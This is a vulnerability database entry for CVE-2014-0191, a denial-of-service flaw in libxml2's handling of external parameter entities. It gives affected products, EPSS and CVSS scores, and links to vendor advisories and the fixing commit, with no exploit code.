Vulnerability Details : CVE-2014-0191
The xmlParserHandlePEReference function in parser.c in libxml2 before 2.9.2, as used in Web Listener in Oracle HTTP Server in Oracle Fusion Middleware 11.1.1.7.0, 12.1.2.0, and 12.1.3.0 and other products, loads external parameter entities regardless of whether entity substitution or validation is enabled, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XML document.
Vulnerability category: Denial of service
Products affected by CVE-2014-0191
- cpe:2.3:a:oracle:fusion_middleware:11.1.1.7.0:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:fusion_middleware:12.1.2.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:fusion_middleware:12.1.3.0.0:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2014-0191
2.41%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 90 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2014-0191
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
4.3
|
MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P |
8.6
|
2.9
|
NIST |
References for CVE-2014-0191
-
http://xmlsoft.org/news.html
Releases
-
https://support.apple.com/kb/HT205031
About the security content of OS X Yosemite v10.10.5 and Security Update 2015-006 - Apple Support
-
https://bugzilla.redhat.com/show_bug.cgi?id=1090976
1090976 – (CVE-2014-0191) CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled
-
http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
Oracle Critical Patch Update - January 2015Patch;Vendor Advisory
-
https://exchange.xforce.ibmcloud.com/vulnerabilities/93092
Libxml2 xmlParserHandlePEReference() denial of service CVE-2014-0191 Vulnerability Report
-
http://lists.opensuse.org/opensuse-updates/2015-12/msg00120.html
openSUSE-SU-2015:2372-1: moderate: Security update for libxml2
-
http://www.securityfocus.com/bid/67233
Libxml2 Entity Substituton CVE-2014-0191 Denial of Service Vulnerability
-
http://www-01.ibm.com/support/docview.wss?uid=swg21678183
IBM Security Bulletin: Rational Systems Tester is affected by Libxml2 vulnerability (CVE-2014-0191)
-
http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html
Apple - Lists.apple.com
-
http://lists.apple.com/archives/security-announce/2015/Aug/msg00002.html
Apple - Lists.apple.com
-
https://support.apple.com/kb/HT205030
About the security content of iOS 8.4.1 - Apple Support
-
http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html
Oracle Critical Patch Update - October 2015
-
http://rhn.redhat.com/errata/RHSA-2015-0749.html
RHSA-2015:0749 - Security Advisory - Red Hat Customer Portal
-
https://git.gnome.org/browse/libxml2/commit/?id=9cd1c3cfbd32655d60572c0a413e017260c854df
Do not fetch external parameter entities (9cd1c3cf) · Commits · GNOME / libxml2 · GitLab
Jump to